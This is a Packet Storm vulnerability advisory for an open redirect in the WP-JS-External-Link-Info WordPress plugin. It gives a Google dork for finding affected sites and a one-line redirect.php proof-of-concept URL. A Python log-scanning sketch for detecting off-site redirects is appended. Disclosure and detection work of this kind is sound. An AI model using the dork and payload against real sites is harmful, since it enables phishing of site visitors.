packetstorm | KingSkrupellos | PACKETSTORM:151679
History: Feb 14, 2019 - 12:00 a.m.

WordPress WP-JS-External-Link-Info 2.2.0 Open Redirection

`####################################################################  
  
# Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 14/02/2019  
# Vendor Homepage : finewebdev.com  
# Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip  
downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip  
# Software Information Link : wordpress.org/plugins/wp-external-links/  
# Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions.  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info''  
# Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
WP External Links (nofollow new tab seo) is open source software.  
  
Manage external and internal links on your site.  
  
####################################################################  
  
# Impact :  
***********  
WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability because the application fails to properly verify user-supplied input. Exploiting this issue may allow attackers to redirect users to arbitrary web sites and conduct phishing attacks; other attacks are also possible.  
  
WordPress Plugin WP Js External Link Info versions 1.21 - 1.81 and 2.2.0 are vulnerable; prior versions may also be affected.  
  
####################################################################  
  
# Open Redirection Exploit :  
*************************  
  
/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`
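
A detection sketch for the issue described above, added here as an example and not part of the original advisory or the plugin's code: it scans web server access logs for requests to the plugin's `redirect.php` whose `url` parameter resolves to a host outside the site's own. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Plugin path as given in the advisory.
REDIRECT_PATH = "/wp-content/plugins/wp-js-external-link-info/redirect.php"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IPs and example.* hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Feb/2019:10:00:01 +0000] "GET ' + REDIRECT_PATH
    + '?url=https://blog.example.com/about HTTP/1.1" 302 0',
    '198.51.100.7 - - [14/Feb/2019:10:02:13 +0000] "GET ' + REDIRECT_PATH
    + '?url=https%3A%2F%2Flogin.example.net%2F HTTP/1.1" 302 0',
    '198.51.100.7 - - [14/Feb/2019:10:02:20 +0000] "GET ' + REDIRECT_PATH
    + '?url=%2F%2Fexample.org%2Fx HTTP/1.1" 302 0',
    '192.0.2.10 - - [14/Feb/2019:10:03:00 +0000] '
    '"GET /index.php?url=https://example.net/ HTTP/1.1" 200 512',
]

def redirect_target_host(value):
    """Return the host a browser would navigate to, or None for a same-site path."""
    # Browsers treat "\" as "/" and drop whitespace/control characters in URLs.
    cleaned = re.sub(r"[\x00-\x20]", "", value.replace("\\", "/"))
    if cleaned.startswith("//"):          # scheme-relative URL
        cleaned = "http:" + cleaned
    try:
        host = urlsplit(cleaned).hostname
    except ValueError:                    # malformed authority, e.g. bad IPv6 literal
        return None
    return host.lower() if host else None

def find_offsite_redirects(log_lines, site_hosts):
    """Return (line_number, target_host, decoded_url) for off-site redirect requests."""
    allowed = {h.lower() for h in site_hosts}
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        request = urlsplit(match.group("target"))
        if request.path.lower() != REDIRECT_PATH:
            continue
        for raw in parse_qs(request.query).get("url", []):  # parse_qs percent-decodes
            host = redirect_target_host(raw)
            if host and host not in allowed:
                hits.append((number, host, raw))
    return hits
```

Pass every hostname the site legitimately serves in `site_hosts`; anything else reaching `redirect.php` is worth reviewing.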